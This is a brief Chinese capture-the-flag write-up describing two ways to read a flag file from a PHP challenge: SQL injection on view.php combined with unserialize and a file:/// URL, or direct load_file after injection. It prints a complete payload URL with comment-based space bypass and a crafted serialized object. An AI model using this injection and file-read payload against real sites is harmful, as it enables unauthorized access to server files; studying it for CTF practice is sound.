兩種姿勢。
1.對view.php界面進行sql注入,反序列化,file:///讀取flag文件
2.可能是作者過濾問題,sql注入后寫一句話沒成功但是可以直接load_file flag文件。
view.php?no=-1/**/union/**/select/**/1,load_file('/var/www/html/flag.php'),3,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'